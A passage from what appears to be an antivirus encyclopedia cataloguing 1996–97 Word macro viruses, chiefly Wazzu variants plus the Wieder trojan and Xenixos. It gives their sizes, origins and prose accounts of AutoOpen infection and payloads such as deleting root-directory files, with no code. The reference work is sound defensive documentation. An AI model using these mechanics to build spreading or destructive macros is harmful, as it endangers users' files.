  26902.  
  26903. It infects the global template when an infected document is
  26904. opened. Further documents become infected when they are also
  26905. opened (AutoOpen).
  26906.  
  26907. [Word_Wazzu.BJ]
  26908. Virus name: Word.Wazzu.BJ
  26909. Virus Type: Word macro virus
  26910. Number of macros: 1
  26911. Encrypted: No
  26912. Macro names: AutoOpen
  26913. Size of macros: 299 Bytes
  26914. Place of origin: Unknown
  26915. Date of origin: Spring 1997
  26916. Destructive: No
  26917. Common In-The-Wild: No
  26918. Description:
  26919.  
  26920. The main difference between this new variant and previous
  26921. Wazzu viruses is that Wazzu.BJ is another "do-nothing" macro
  26922. virus with some code modifications and no payload.
  26923.  
  26924. It infects the global template when an infected document is
  26925. opened. Further documents become infected when they are also
  26926. opened (AutoOpen).
  26927.  
  26928. [Word_Wazzu.BK]
  26929. Virus name: Word.Wazzu.BK
  26930. Virus Type: Word macro virus
  26931. Number of macros: 1
  26932. Encrypted: No
  26933. Macro names: AutoOpen
  26934. Size of macros: 623 Bytes
  26935. Place of origin: Unknown
  26936. Date of origin: Spring 1997
  26937. Destructive: Yes
  26938. Common In-The-Wild: No
  26939. Description:
  26940.  
  26941. The main difference between this new variant and previous
  26942. Wazzu viruses is that Wazzu.BK has a slightly modified code.
  26943.  
  26944. It infects the global template when an infected document is
  26945. opened. Further documents become infected when they are also
  26946. opened (AutoOpen).
  26947.  
  26948. The payload is similar to the original Wazzu virus. For
  26949. additional information, please refer to the Wazzu.A virus
  26950. description.
  26951.  
  26952. [Word_Wazzu.BL]
  26953. Virus name: Word.Wazzu.BL
  26954. Virus Type: Word macro virus
  26955. Number of macros: 1
  26956. Encrypted: No
  26957. Macro names: AutoOpen
  26958. Size of macros: 678 Bytes
  26959. Place of origin: Unknown
  26960. Date of origin: Spring 1997
  26961. Destructive: Yes
  26962. Common In-The-Wild: No
  26963. Description:
  26964.  
  26965. The main difference between this new variant and previous
  26966. Wazzu viruses is that Wazzu.BL has a slightly modified code.
  26967.  
  26968. It infects the global template when an infected document is
  26969. opened. After infection of the global template, it fails to
  26970. infect other documents. Therefore, it is not likely to survive
  26971. in the wild.
  26972.  
  26973. [Word_Wazzu.BM]
  26974. Virus name: Word.Wazzu.BM
  26975. Virus Type: Word macro virus
  26976. Number of macros: 1
  26977. Encrypted: No
  26978. Macro names: AutoOpen
  26979. Size of macros: 296 Bytes
  26980. Place of origin: USA
  26981. Date of origin: Spring 1997
  26982. Destructive: No
  26983. Common In-The-Wild: No
  26984. Description:
  26985.  
  26986. The main difference between this new variant and previous
  26987. Wazzu viruses is that Wazzu.BM is another "do-nothing" macro
  26988. virus with modified codes and no payload.
  26989.  
  26990. It infects the global template when an infected document is
  26991. opened. Further documents become infected when they are also
  26992. opened (AutoOpen).
  26993.  
  26994. [Word_Wazzu.BN]
  26995. Virus name: Word.Wazzu.BN
  26996. Virus Type: Word macro virus
  26997. Number of macros: 1
  26998. Encrypted: No
  26999. Macro names: AutoOpen
  27000. Size of macros: 433 Bytes
  27001. Place of origin: Germany
  27002. Date of origin: Spring 1997
  27003. Destructive: No
  27004. Common In-The-Wild: No
  27005. Description:
  27006.  
  27007. The main difference between this new variant and previous
  27008. Wazzu viruses is that Wazzu.BN is another "do-nothing" macro
  27009. virus with modified codes and no payload.
  27010.  
  27011. It infects the global template when an infected document is
  27012. opened. Further documents become infected when they are also
  27013. opened (AutoOpen).
  27014.  
  27015. [Word_Wazzu.BO]
  27016. Virus name: Word.Wazzu.BO
  27017. Virus Type: Word macro virus
  27018. Number of macros: 1
  27019. Encrypted: Yes
  27020. Macro names: AutoOpen
  27021. Size of macros: 632 Bytes
  27022. Place of origin: Unknown
  27023. Date of origin: 1997
  27024. Destructive: Yes
  27025. Common In-The-Wild: No
  27026. Description:
  27027.  
  27028. The main difference between this new variant and previous
  27029. Wazzu viruses is that Wazzu.BO has a slightly corrupted code.
  27030.  
  27031. It infects the global template when an infected document is
  27032. opened. Further documents become infected when they are also
  27033. opened (AutoOpen).
  27034.  
  27035. The payload is similar to the original Wazzu virus. There is a
  27036. 3/5 chance that one word is moved to another position in the
  27037. active document.
  27038.  
  27039. [Word_Wazzu.BP]
  27040. Virus name: Word.Wazzu.BP
  27041. Virus Type: Word macro virus
  27042. Number of macros: 1
  27043. Encrypted: Yes
  27044. Macro names: AutoOpen
  27045. Size of macros: 289 Bytes
  27046. Place of origin: Unknown
  27047. Date of origin: Spring 1997
  27048. Destructive: No
  27049. Common In-The-Wild: No
  27050. Description:
  27051.  
  27052. The main difference between this new variant and previous
  27053. Wazzu viruses is that Wazzu.BP displays the following
  27054. message:
  27055.  
  27056. "   Leaving Traces of Wazzu Around the World...   "
  27057.  
  27058. Wazzu.BP infects the global template when an infected
  27059. document is opened. Further documents become infected
  27060. when they are also opened (AutoOpen).
  27061.  
  27062. [Word_Wazzu.BQ]
  27063. Virus name: Word.Wazzu.BQ
  27064. Virus Type: Word macro virus
  27065. Number of macros: 1
  27066. Encrypted: No
  27067. Macro names: AutoOpen
  27068. Size of macros: 670 Bytes
  27069. Place of origin: Unknown
  27070. Date of origin: Spring 1997
  27071. Destructive: Yes
  27072. Common In-The-Wild: No
  27073. Description:
  27074.  
  27075. The main difference between this new variant and previous
  27076. Wazzu viruses is that Wazzu.BQ has a slightly modified code.
  27077. It contains one additional virus author comment.
  27078.  
  27079. Wazzu.BQ infects the global template when an infected
  27080. document is opened. Further documents become infected
  27081. when they are also opened (AutoOpen).
  27082.  
  27083. The payload is similar to the original Wazzu virus. For
  27084. additional information, please refer to the Wazzu.A virus
  27085. description.
  27086.  
  27087. [Word_Wazzu.BR]
  27088. Virus name: Word.Wazzu.BR
  27089. Virus Type: Word macro virus
  27090. Number of macros: 1
  27091. Encrypted: No
  27092. Macro names: AutoOpen
  27093. Size of macros: 332 Bytes
  27094. Place of origin: Unknown
  27095. Date of origin: Spring 1997
  27096. Destructive: No
  27097. Common In-The-Wild: No
  27098. Description:
  27099.  
  27100. The main difference between this new variant and previous
  27101. Wazzu viruses is that Wazzu.BR is another "do-nothing" macro
  27102. virus with some code modifications and no payload.
  27103.  
  27104. It infects the global template when an infected document is
  27105. opened. Further documents become infected when they are also
  27106. opened (AutoOpen).
  27107.  
  27108. [Word_Wazzu.BS]
  27109. Virus name: Word.Wazzu.BS
  27110. Virus Type: Word macro virus
  27111. Number of macros: 1
  27112. Encrypted: No
  27113. Macro names: AutoOpen
  27114. Size of macros: 605 Bytes
  27115. Place of origin: France
  27116. Date of origin: Spring 1997
  27117. Destructive: Yes
  27118. Common In-The-Wild: No
  27119. Description:
  27120.  
  27121. The main difference between this new variant and previous
  27122. Wazzu viruses is that Wazzu.BS replaces the word "donc" with
  27123. the following:
  27124.  
  27125. "   Mon prof est con,   "
  27126.  
  27127. This occurs when a document is opened (probability: 3/4).
  27128.  
  27129. The second payload is similar to Wazzu.A, where one word
  27130. is moved from one position to another. For further details,
  27131. please refer to the Wazzu.A virus description.
  27132.  
  27133. Wazzu.BS infects the global template when an infected
  27134. document is opened. Further documents become infected
  27135. when they are also opened (AutoOpen).
  27136.  
  27137. [Word_Wazzu.BU]
  27138. Virus name: Word.Wazzu.BU
  27139. Virus Type: Word macro virus
  27140. Number of macros: 1
  27141. Encrypted: No
  27142. Macro names: AutoOpen
  27143. Size of macros: 148 Bytes
  27144. Place of origin: Unknown
  27145. Date of origin: Spring 1997
  27146. Destructive: No
  27147. Common In-The-Wild: No
  27148. Description:
  27149.  
  27150. The main difference between this new variant and previous
  27151. Wazzu viruses is that Wazzu.BU is another "do-nothing" macro
  27152. virus with some code modifications and no payload.
  27153.  
  27154. It infects the global template when an infected document is
  27155. opened. Further documents become infected when they are also
  27156. opened (AutoOpen).
  27157.  
  27158. [Word_Wazzu.BV]
  27159. Virus name: Word.Wazzu.BV
  27160. Virus Type: Word macro virus
  27161. Number of macros: 1
  27162. Encrypted: No
  27163. Macro names: AutoOpen
  27164. Size of macros: 152 Bytes
  27165. Place of origin: Unknown
  27166. Date of origin: Spring 1997
  27167. Destructive: No
  27168. Common In-The-Wild: No
  27169. Description:
  27170.  
  27171. The main difference between this new variant and previous
  27172. Wazzu viruses is that Wazzu.BV is another "do-nothing" macro
  27173. virus with some code modifications and no payload.
  27174.  
  27175. It infects the global template when an infected document is
  27176. opened. Further documents become infected when they are also
  27177. opened (AutoOpen).
  27178.  
  27179. [Word_Wazzu.BW]
  27180. Virus name: Word.Wazzu.BW
  27181. Virus Type: Word macro virus
  27182. Number of macros: 1
  27183. Encrypted: No
  27184. Macro names: AutoOpen
  27185. Size of macros: 158 Bytes
  27186. Place of origin: Unknown
  27187. Date of origin: Spring 1997
  27188. Destructive: No
  27189. Common In-The-Wild: No
  27190. Description:
  27191.  
  27192. The main difference between this new variant and previous
  27193. Wazzu viruses is that Wazzu.BW is another "do-nothing" macro
  27194. virus with some code modifications and no payload.
  27195.  
  27196. It infects the global template when an infected document is
  27197. opened. Further documents become infected when they are also
  27198. opened (AutoOpen).
  27199.  
  27200. [Word_Wazzu.BX]
  27201. Virus name: Word.Wazzu.BX
  27202. Virus Type: Word macro virus
  27203. Number of macros: 1
  27204. Encrypted: No
  27205. Macro names: AutoOpen
  27206. Size of macros: 345 Bytes
  27207. Place of origin: Unknown
  27208. Date of origin: Spring 1997
  27209. Destructive: No
  27210. Common In-The-Wild: No
  27211. Description:
  27212.  
  27213. The main difference between this new variant and previous
  27214. Wazzu viruses is that Wazzu.BX is another "do-nothing" macro
  27215. virus with some code modifications and no payload.
  27216.  
  27217. It infects the global template when an infected document is
  27218. opened. Further documents become infected when they are also
  27219. opened (AutoOpen).
  27220.  
  27221. [Word_Wazzu.BY]
  27222. Virus name: Word.Wazzu.BY
  27223. Virus Type: Word macro virus
  27224. Number of macros: 1
  27225. Encrypted: No
  27226. Macro names: AutoOpen
  27227. Size of macros: 277 Bytes
  27228. Place of origin: Unknown
  27229. Date of origin: Spring 1997
  27230. Destructive: No
  27231. Common In-The-Wild: No
  27232. Description:
  27233.  
  27234. The main difference between this new variant and previous
  27235. Wazzu viruses is that Wazzu.BY is another "do-nothing" macro
  27236. virus with some code modifications and no payload.
  27237.  
  27238. It infects the global template when an infected document is
  27239. opened. Further documents become infected when they are also
  27240. opened (AutoOpen).
  27241.  
  27242. [Word_Wazzu.C]
  27243. Virus name: Word.Wazzu.C
  27244. Virus Type: Word macro virus
  27245. Number of macros: 1
  27246. Encrypted: No
  27247. Macro names: autoOpen
  27248. Size of macros: 433 Bytes
  27249. Place of origin: Unknown
  27250. Date of origin: Summer 1996
  27251. Destructive: No
  27252. Common In-The-Wild: Yes
  27253. Description:
  27254.  
  27255. The difference between this new variant and the original
  27256. Wazzu.A virus is that Wazzu.C does not have any
  27257. destructive payload.  It is only infectious.
  27258.  
  27259. During the Spring of 1997, Wazzu.C was discovered in a Word97
  27260. document (Word8).
  27261.  
  27262. [Word_Wazzu.CB]
  27263. Virus name: Word.Wazzu.CB
  27264. Virus Type: Word macro virus
  27265. Number of macros: 1
  27266. Encrypted: No
  27267. Macro names: AutoOpen
  27268. Size of macros: 343 Bytes
  27269. Place of origin: Unknown
  27270. Date of origin: Spring 1997
  27271. Destructive: No
  27272. Common In-The-Wild: No
  27273. Description:
  27274.  
  27275. The main difference between this new variant and previous
  27276. Wazzu viruses is that Wazzu.CB is another "do-nothing" macro
  27277. virus with some corrupted codes and no payload.
  27278.  
  27279. It infects the global template when an infected document is
  27280. opened. Further documents become infected when they are also
  27281. opened (AutoOpen).
  27282.  
  27283. [Word_Wazzu.D]
  27284. Virus name: Word.Wazzu.D
  27285. Virus Type: Word macro virus
  27286. Number of macros: 1
  27287. Encrypted: No
  27288. Macro names: autoOpen
  27289. Size of macros: 331 Bytes
  27290. Place of origin: Unknown
  27291. Date of origin: Summer 1996
  27292. Destructive: No
  27293. Common In-The-Wild: No
  27294. Description:
  27295.  
  27296. The difference between this new variant and Wazzu.C is that
  27297. some unused codes are missing in Wazzu.D. The difference to
  27298. the original Wazzu is that it does not contain any destructive
  27299. payload, such as changing documents. Wazzu.D is only infectious.
  27300.  
  27301. [Word_Wazzu.E]
  27302. Virus name: Word.Wazzu.E
  27303. Virus Type: Word macro virus
  27304. Number of macros: 1
  27305. Encrypted: No
  27306. Macro names: autoOpen
  27307. Size of macros: 318 Bytes
  27308. Place of origin: Unknown
  27309. Date of origin: September 1996
  27310. Destructive: No
  27311. Common In-The-Wild: Yes
  27312. Description:
  27313.  
  27314. The difference between this new variant and Wazzu.D is that
  27315. some unused codes are missing in Wazzu.E. The difference to
  27316. the original Wazzu is that it does not contain any destructive
  27317. payload, such as changing documents. Wazzu.E is only infectious.
  27318.  
  27319. [Word_Wazzu.F]
  27320. Virus name: Word.Wazzu.F
  27321. Virus Type: Word macro virus
  27322. Number of macros: 1
  27323. Encrypted: Yes
  27324. Macro names: autoOpen
  27325. Size of macros: 450 Bytes
  27326. Place of origin: Unknown
  27327. Date of origin: September 1996
  27328. Destructive: No
  27329. Common In-The-Wild: Yes
  27330. Description:
  27331.  
  27332. Wazzu.F is a minor variant of Wazzu.C with two changes.
  27333. Wazzu.F displays a message with a 1/10 chance and its code
  27334. is encrypted.  The difference to the original Wazzu is that
  27335. Wazzu.F does not contain any destructive payload, such as
  27336. changing documents.  Wazzu.F is only infectious.
  27337.  
  27338. The following message is displayed with a 1/10 chance:
  27339.  
  27340. "   This one's for you, Bosco.   "
  27341.  
  27342. [Word_Wazzu.G]
  27343. Virus name: Word.Wazzu.G
  27344. Virus Type: Word macro virus
  27345. Number of macros: 1
  27346. Encrypted: No
  27347. Macro names: AutoOpen
  27348. Size of macros: 632 Bytes
  27349. Place of origin: Unknown
  27350. Date of origin: 1996
  27351. Destructive: Yes
  27352. Common In-The-Wild: No
  27353. Description:
  27354.  
  27355. The main difference between this new variant and previous
  27356. Wazzu viruses is that Wazzu.G has a slightly modified code.
  27357.  
  27358. It infects the global template when an infected document is
  27359. opened. Further documents become infected when they are also
  27360. opened (AutoOpen).
  27361.  
  27362. The payload is similar to the original Wazzu virus. There is a
  27363. 3/5 chance that one word is moved to another position in the
  27364. active document.
  27365.  
  27366. [Word_Wazzu.H]
  27367. Virus name: Word.Wazzu.H
  27368. Virus Type: Word macro virus
  27369. Number of macros: 1
  27370. Encrypted: Yes
  27371. Macro names: AutoOpen
  27372. Size of macros: 943 Bytes
  27373. Place of origin: Unknown
  27374. Date of origin: 1996
  27375. Destructive: Yes
  27376. Common In-The-Wild: Yes
  27377. Description:
  27378.  
  27379. Wazzu.H is a newly rewritten Wazzu variant. Each of its six
  27380. payloads triggers with a chance of 1/6.
  27381.  
  27382. One payload displays the following message:
  27383.  
  27384. "   Thank's for using Microsloth Warp for Windblowz   "
  27385.  
  27386. Other payloads create 20 new documents or delete all files in
  27387. the root directory (C:\*.*).
  27388.  
  27389. Wazzu.H infects the global template when an infected
  27390. document is opened. Further files become infected when they
  27391. are also opened (AutoOpen).
  27392.  
  27393. [Word_Wazzu.I]
  27394. Virus name: Word.Wazzu.I
  27395. Virus Type: Word macro virus
  27396. Number of macros: 1
  27397. Encrypted: No
  27398. Macro names: AutoOpen
  27399. Size of macros: 333 Bytes
  27400. Place of origin: Unknown
  27401. Date of origin: 1996
  27402. Destructive: No
  27403. Common In-The-Wild: No
  27404. Description:
  27405.  
  27406. The main difference between this new variant and previous
  27407. Wazzu viruses is that Wazzu.I is another "do-nothing" macro
  27408. virus with no payload and slightly modified code.
  27409.  
  27410. It infects the global template when an infected document is
  27411. opened. Further documents become infected when they are also
  27412. opened (AutoOpen).
  27413.  
  27414. [Word_Wazzu.J]
  27415. Virus name: Word.Wazzu.J
  27416. Virus Type: Word macro virus
  27417. Number of macros: 1
  27418. Encrypted: No
  27419. Macro names: AutoOpen
  27420. Size of macros: 675 Bytes
  27421. Place of origin: Unknown
  27422. Date of origin: 1996
  27423. Destructive: Yes
  27424. Common In-The-Wild: Yes
  27425. Description:
  27426.  
  27427. The difference between this new variant and the original
  27428. Wazzu.A virus is that some spaces have been deleted from
  27429. the macro virus code.
  27430.  
  27431. For more information, please refer to the Wazzu.A virus
  27432. description.
  27433.  
  27434. [Word_Wazzu.K]
  27435. Virus name: Word.Wazzu.K
  27436. Virus Type: Word macro virus
  27437. Number of macros: 1
  27438. Encrypted: No
  27439. Macro names: AutoOpen
  27440. Size of macros: 632 Bytes
  27441. Place of origin: Unknown
  27442. Date of origin: 1996
  27443. Destructive: No
  27444. Common In-The-Wild: No
  27445. Description:
  27446.  
  27447. The main difference between this new variant and previous
  27448. Wazzu viruses is that Wazzu.K is another "do-nothing" macro
  27449. virus with a corrupted payload and slightly modified code.
  27450.  
  27451. It infects the global template when an infected document is
  27452. opened. Further documents become infected when they are also
  27453. opened (AutoOpen).
  27454.  
  27455. [Word_Wazzu.L]
  27456. Virus name: Word.Wazzu.L
  27457. Virus Type: Word macro virus
  27458. Number of macros: 1
  27459. Encrypted: No
  27460. Macro names: AutoOpen
  27461. Size of macros: 347 Bytes
  27462. Place of origin: Unknown
  27463. Date of origin: 1996
  27464. Destructive: Yes
  27465. Common In-The-Wild: No
  27466. Description:
  27467.  
  27468. The main difference between this new variant and previous
  27469. Wazzu viruses is that Wazzu.L has some modified codes.
  27470.  
  27471. It infects the global template when an infected document is
  27472. opened. Further documents become infected when they are
  27473. also opened (AutoOpen).
  27474.  
  27475. When a user opens a document, Wazzu.L adds the following
  27476. text at the end of the document:
  27477.  
  27478. "   wazzu!   "
  27479.  
  27480. [Word_Wazzu.M]
  27481. Virus name: Word.Wazzu.M
  27482. Virus Type: Word macro virus
  27483. Number of macros: 1
  27484. Encrypted: No
  27485. Macro names: AutoOpen
  27486. Size of macros: 443 Bytes
  27487. Place of origin: Unknown
  27488. Date of origin: 1996
  27489. Destructive: No
  27490. Common In-The-Wild: No
  27491. Description:
  27492.  
  27493. The main difference between this new variant and previous
  27494. Wazzu viruses is that Wazzu.M is another "do-nothing" macro
  27495. virus with a corrupted payload and slightly modified code.
  27496.  
  27497. Due to the corruption, Word displays an error message.
  27498.  
  27499. It infects the global template when an infected document is
  27500. opened. Further documents become infected when they are also
  27501. opened (AutoOpen).
  27502.  
  27503. [Word_Wazzu.N]
  27504. Virus name: Word.Wazzu.N
  27505. Virus Type: Word macro virus
  27506. Number of macros: 1
  27507. Encrypted: No
  27508. Macro names: AutoOpen
  27509. Size of macros: 432 Bytes
  27510. Place of origin: Unknown
  27511. Date of origin: 1996
  27512. Destructive: Yes
  27513. Common In-The-Wild: No
  27514. Description:
  27515.  
  27516. The main difference between this new variant and previous
  27517. Wazzu viruses is that the code has been slightly modified.
  27518.  
  27519. It infects the global template when an infected document is
  27520. opened. Further documents become infected when they are also
  27521. opened (AutoOpen).
  27522.  
  27523. [Word_Wazzu.O]
  27524. Virus name: Word.Wazzu.O
  27525. Virus Type: Word macro virus
  27526. Number of macros: 1
  27527. Encrypted: No
  27528. Macro names: AutoOpen
  27529. Size of macros: 309 Bytes
  27530. Place of origin: Unknown
  27531. Date of origin: 1996
  27532. Destructive: No
  27533. Common In-The-Wild: Yes
  27534. Description:
  27535.  
  27536. The main difference between this new variant and previous
  27537. Wazzu viruses is that Wazzu.O is another "do-nothing" macro
  27538. virus with no payload.
  27539.  
  27540. It infects the global template when an infected document is
  27541. opened. Further documents become infected when they are also
  27542. opened (AutoOpen).
  27543.  
  27544. [Word_Wazzu.P]
  27545. Virus name: Word.Wazzu.P
  27546. Virus Type: Word macro virus
  27547. Number of macros: 1
  27548. Encrypted: No
  27549. Macro names: AutoOpen
  27550. Size of macros: 460 Bytes
  27551. Place of origin: Unknown
  27552. Date of origin: 1996
  27553. Destructive: No
  27554. Common In-The-Wild: Yes
  27555. Description:
  27556.  
  27557. The difference between this new variant and the original
  27558. Wazzu.A virus is that the payload has been deleted from the
  27559. code.
  27560.  
  27561. Wazzu.P is still able to infect the global template when an
  27562. infected document is opened. Further documents become
  27563. infected when they are also opened (AutoOpen).
  27564.  
  27565. [Word_Wazzu.Q]
  27566. Virus name: Word.Wazzu.Q
  27567. Virus Type: Word macro virus
  27568. Number of macros: 1
  27569. Encrypted: No
  27570. Macro names: AutoOpen
  27571. Size of macros: 331 Bytes
  27572. Place of origin: Unknown
  27573. Date of origin: 1996
  27574. Destructive: No
  27575. Common In-The-Wild: No
  27576. Description:
  27577.  
  27578. The main difference between this new variant and previous
  27579. Wazzu viruses is that Wazzu.Q is another "do-nothing" macro
  27580. virus with no payload and slightly modified code.
  27581.  
  27582. It infects the global template when an infected document is
  27583. opened. Further documents become infected when they are also
  27584. opened (AutoOpen).
  27585.  
  27586. [Word_Wazzu.R]
  27587. Virus name: Word.Wazzu.R
  27588. Virus Type: Word macro virus
  27589. Number of macros: 1
  27590. Encrypted: Yes
  27591. Macro names: AutoOpen
  27592. Size of macros: 552 Bytes
  27593. Place of origin: Unknown
  27594. Date of origin: 1996
  27595. Destructive: No
  27596. Common In-The-Wild: No
  27597. Description:
  27598.  
  27599. Wazzu.R is a minor variant of Wazzu.F with some additional
  27600. codes. Wazzu.R displays the following message with a 1/10
  27601. chance:
  27602.  
  27603. "   This one's for you, Bosco.   "
  27604.  
  27605. Wazzu.R infects the global template (normal.dot) when an
  27606. infected document is opened. Further documents become
  27607. infected when they are also opened (AutoOpen).
  27608.  
  27609. [Word_Wazzu.S]
  27610. Virus name: Word.Wazzu.S
  27611. Virus Type: Word macro virus
  27612. Number of macros: 1
  27613. Encrypted: No
  27614. Macro names: AutoOpen
  27615. Size of macros: 343 Bytes
  27616. Place of origin: Unknown
  27617. Date of origin: 1996
  27618. Destructive: No
  27619. Common In-The-Wild: No
  27620. Description:
  27621.  
  27622. The main difference between this new variant and previous
  27623. Wazzu viruses is that Wazzu.S is another "do-nothing" macro
  27624. virus with a corrupted payload and slightly modified code.
  27625.  
  27626. Due to the corruption, Word displays an error message.
  27627.  
  27628. It infects the global template when an infected document is
  27629. opened. Further documents become infected when they are also
  27630. opened (AutoOpen).
  27631.  
  27632. [Word_Wazzu.T]
  27633. Virus name: Word.Wazzu.T
  27634. Virus Type: Word macro virus
  27635. Number of macros: 1
  27636. Encrypted: No
  27637. Macro names: AutoOpen
  27638. Size of macros: 431 Bytes
  27639. Place of origin: Unknown
  27640. Date of origin: 1996
  27641. Destructive: No
  27642. Common In-The-Wild: No
  27643. Description:
  27644.  
  27645. The main difference between this new variant and previous
  27646. Wazzu viruses is that Wazzu.T is another "do-nothing" macro
  27647. virus with no payload.
  27648.  
  27649. It infects the global template when an infected document is
  27650. opened. Further documents become infected when they are also
  27651. opened (AutoOpen).
  27652.  
  27653. [Word_Wazzu.U]
  27654. Virus name: Word.Wazzu.U
  27655. Virus Type: Word macro virus
  27656. Number of macros: 1
  27657. Encrypted: No
  27658. Macro names: AutoOpen
  27659. Size of macros: 621 Bytes
  27660. Place of origin: Unknown
  27661. Date of origin: 1996
  27662. Destructive: Yes
  27663. Common In-The-Wild: No
  27664. Description:
  27665.  
  27666. The main difference between this new variant and previous
  27667. Wazzu viruses is that Wazzu.U has a slightly modified code.
  27668.  
  27669. It infects the global template when an infected document is
  27670. opened. Further documents become infected when they are also
  27671. opened (AutoOpen).
  27672.  
  27673. The payload is similar to the original Wazzu virus. There is a
  27674. 3/5 chance that one word is moved to another position in the
  27675. active document.
  27676.  
  27677. [Word_Wazzu.V]
  27678. Virus name: Word.Wazzu.V
  27679. Virus Type: Word macro virus
  27680. Number of macros: 1
  27681. Encrypted: No
  27682. Macro names: AutoOpen
  27683. Size of macros: 375 Bytes
  27684. Place of origin: Unknown
  27685. Date of origin: Unknown
  27686. Destructive: No
  27687. Common In-The-Wild: No
  27688. Description:
  27689.  
  27690. The main difference between this new variant and previous
  27691. Wazzu viruses is that Wazzu.V is another "do-nothing" macro
  27692. virus with some corrupted codes and no payload.
  27693.  
  27694. It infects the global template when an infected document is
  27695. opened. Further documents become infected when they are also
  27696. opened (AutoOpen).
  27697.  
  27698. It also contains the following comment in its code:
  27699.  
  27700. "   REM This macro wipes out the Wazzu Virus!   "
  27701.  
  27702. [Word_Wazzu.W]
  27703. Virus name: Word.Wazzu.W
  27704. Virus Type: Word macro virus
  27705. Number of macros: 1
  27706. Encrypted: No
  27707. Macro names: AutoOpen
  27708. Size of macros: 332 Bytes
  27709. Place of origin: Unknown
  27710. Date of origin: 1996
  27711. Destructive: No
  27712. Common In-The-Wild: No
  27713. Description:
  27714.  
  27715. The main difference between this new variant and previous
  27716. Wazzu viruses is that Wazzu.W is another "do-nothing" macro
  27717. virus with no payload.
  27718.  
  27719. It infects the global template when an infected document is
  27720. opened. Further documents become infected when they are also
  27721. opened (AutoOpen).
  27722.  
  27723. [Word_Wazzu.X]
  27724. Virus name: Word.Wazzu.X
  27725. Virus Type: Word macro virus
  27726. Number of macros: 1
  27727. Encrypted: No
  27728. Macro names: AutoOpen
  27729. Size of macros: 617 Bytes
  27730. Place of origin: Unknown
  27731. Date of origin: 1996
  27732. Destructive: No
  27733. Common In-The-Wild: Yes
  27734. Description:
  27735.  
  27736. The main difference between this new variant and previous
  27737. Wazzu viruses is that Wazzu.X is another "do-nothing" macro
  27738. virus with no payload.
  27739.  
  27740. It infects the global template when an infected document is
  27741. opened. Further documents become infected when they are also
  27742. opened (AutoOpen).
  27743.  
  27744. Wazzu.X contains the following comment in its code:
  27745.  
  27746. "   The Meat Grinder virus - Thanks to Kermit the Frog,   "
  27747. "             ' and Kermit the Protocol                 "
  27748.  
  27749. Wazzu.X is also able to convert itself to the Word97 Word
  27750. format (Word8).
  27751.  
  27752. [Word_Wazzu.Z]
  27753. Virus name: Word.Wazzu.Z
  27754. Virus Type: Word macro virus
  27755. Number of macros: 1
  27756. Encrypted: No
  27757. Macro names: AutoOpen
  27758. Size of macros: 666 Bytes
  27759. Place of origin: Unknown
  27760. Date of origin: Unknown
  27761. Destructive: Yes
  27762. Common In-The-Wild: No
  27763. Description:
  27764.  
  27765. The main difference between this new variant and previous
  27766. Wazzu viruses is that Wazzu.Z has a slightly modified code.
  27767.  
  27768. It infects the global template when an infected document is
  27769. opened. Further documents become infected when they are also
  27770. opened (AutoOpen).
  27771.  
  27772. The payload is similar to the original Wazzu virus. For
  27773. additional information, please refer to the Wazzu.A virus
  27774. description.
  27775.  
  27776. [Word_Wazzu.Y]
  27777. Virus name: Word.Wazzu.Y
  27778. Virus Type: Word macro virus
  27779. Number of macros: 1
  27780. Encrypted: No
  27781. Macro names: autoOpen
  27782. Size of macros: 652 Bytes
  27783. Place of origin: Unknown
  27784. Date of origin: Unknown
  27785. Destructive: Yes
  27786. Seen In-The-Wild: No
  27787. Description:
  27788.  
  27789. The difference between this new variant and the original
  27790. Wazzu.A virus is that some TABs have been replaced by
  27791. spaces in the source code.  This has no effect on the
  27792. behavior of this new variant.
  27793.  
  27794. For further information, please refer to the Wazzu.A virus.
  27795.  
  27796. [Word.Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen)]
  27797. Virus name: Word.Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen)
  27798. Virus Type: Word macro virus
  27799. Number of macros: 2
  27800. Encrypted: No
  27801. Macro names: AutoOpen, AutoClose
  27802. Size of macros: 638 Bytes
  27803. Place of origin: Germany
  27804. Date of origin: Spring 1996
  27805. Destructive: Yes
  27806. Common In-The-Wild: No
  27807. Description:
  27808.  
  27809. Wieder is not a virus but a trojan horse. It does not infect
  27810. other files.
  27811.  
  27812. When an infected document is opened, Wieder creates the
  27813. directory "C:\TROJA", and moves the system file
  27814. "C:\AUTOEXEC.BAT" into the newly created directory.
  27815. After moving the file the original files are deleted.
  27816.  
  27817. When closing an infected document, the following messages are
  27818. displayed:
  27819.  
  27820. "   Auf Wieder÷ffnen   "
  27821.  
  27822. "   P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei   "
  27823. "   gerne wiederhaben moechten, sollten Sie einen   "
  27824. "   Blick in das neue Verzeichnis C:\TROJA werfen...   "
  27825.  
  27826. The original document, which included the trojan, has the
  27827. following messages:
  27828.  
  27829. "   Trojanisches Pferd   "
  27830. "   Wenn Sie diese Zeilen lesen, wurde bereits Ihre AUTOEXEC.BAT-   "
  27831. "   Datei aus dem Hauptverzeichnis C:\ entfernt. Hoffentlich haben   "
  27832. "   Sie eine Kopie davon ?   "
  27833.  
  27834. "   Genauso einfach waere es gewesen, Ihre Festplatte zu loeschen   "
  27835. "   und mit ein klein wenig mehr Aufwand koennte man auch einen   "
  27836. "   Virus installieren.   "
  27837.  
  27838. [Word_Xenixos.A (a.k.a. Nemesis, Evil One, XOS)]
  27839. Virus name: Word.Xenixos.A (a.k.a. Nemesis, Evil One, XOS)
  27840. Virus Type: Word macro virus
  27841. Number of macros: 11
  27842. Encrypted: Yes
  27843. Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken,
  27844.              DateiDruckenStandard, DateiOeffnen, DateiSpeichern,
  27845.              SateiSpeichernUnter, Drop, Dummy, ExtrasMakro
  27846. Size of macros: 31342 Bytes
  27847. Place of origin: Austria
  27848. Date of origin: February 1996
  27849. Destructive: Yes
  27850. Common In-The-Wild: No
  27851. Description:
  27852.  
  27853. Xenixos was the first macro virus that was written especially
  27854. for the German version of Microsoft Word. All macro names
  27855. are in German, and therefore it only works with the German
  27856. Word version.
  27857.  
  27858. The infected global template (normal.dot) includes the
  27859. following additional macros:
  27860.  
  27861. "AutoClose"
  27862. "AutoExit"
  27863. "AutoNew"
  27864.  
  27865. When an infected document is opened, Xenixos infects the
  27866. global template unless the "DateiSpeichernUnter" macro is
  27867. already present.  Further documents become infected when
  27868. using the "DateiSpeichern" and "DateiSpeichernUnter"
  27869. commands. Files with the name "VIRUS.DOT" will not become
  27870. infected.
  27871.  
  27872. During infection, Xenixos checks the system date and then
  27873. activates various destructive payloads according to the date.
